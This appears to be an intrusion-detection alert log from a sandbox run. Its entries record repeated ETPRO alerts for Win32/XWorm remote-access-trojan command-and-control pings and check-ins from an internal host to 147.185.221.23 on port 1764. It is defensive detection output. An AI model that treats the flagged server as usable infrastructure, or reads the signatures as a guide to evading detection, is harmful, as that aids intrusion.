                                                                                        2024-10-13T19:12:13.583254+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.583254+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.728205+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.728205+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.742030+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.742030+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.879802+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.879802+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.886997+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:13.886997+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.002233+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.002233+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.017757+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.017757+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.157330+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.157330+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.167908+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.167908+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.363773+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.363773+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.527584+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.527584+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.574078+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.574078+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.708463+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.708463+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.734315+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.734315+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.912747+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.912747+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.916697+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:14.916697+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.118966+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.118966+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.188522+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.188522+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.389080+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.389080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.411312+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.411312+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.548454+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.548454+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.587779+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.587779+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.730341+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.730341+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.741610+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.741610+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.953018+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:15.953018+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.064764+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.064764+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.248132+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.248132+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.273825+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:16.273825+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.012426+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.012426+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.017309+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.017309+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.369321+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.369321+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.447217+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.447217+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.658320+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.658320+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.684649+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.684649+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.975156+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.975156+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.975399+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:17.975399+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.365347+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.365347+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.365361+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.365361+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.587055+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.587055+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.609956+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.609956+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.817595+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.817595+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.835712+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:18.835712+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.574419+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.574419+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.596150+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.596150+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.873617+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.873617+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.948926+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:19.948926+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.084544+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.084544+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.325538+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.325538+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.351080+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.351080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.515764+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.515764+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.526347+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.526347+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.736662+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.736662+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.745911+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.745911+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.877835+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.877835+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.886460+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:20.886460+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.013792+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.013792+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.081216+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.081216+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.192567+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.192567+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.308580+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.308580+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.349009+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.349009+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.431301+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:21.431301+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.095058+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.095058+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.115260+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.115260+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.232557+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.232557+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.430561+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.430561+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.440941+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.440941+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.658822+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.658822+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.673457+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.673457+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.781898+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.781898+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.819264+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:22.819264+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.004225+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.004225+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.090074+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.090074+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.244328+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.244328+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.262297+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.262297+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.412210+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.412210+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.579801+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.579801+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.595426+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.595426+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.713797+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.713797+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.760393+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.760393+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.850608+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.850608+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.921035+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:23.921035+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.006148+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.006148+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.161676+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.161676+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.352233+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.352233+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.574517+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.574517+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.679730+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.679730+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.733960+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.733960+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.814751+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.814751+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.857446+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.857446+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.950074+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.950074+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:24.997099+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
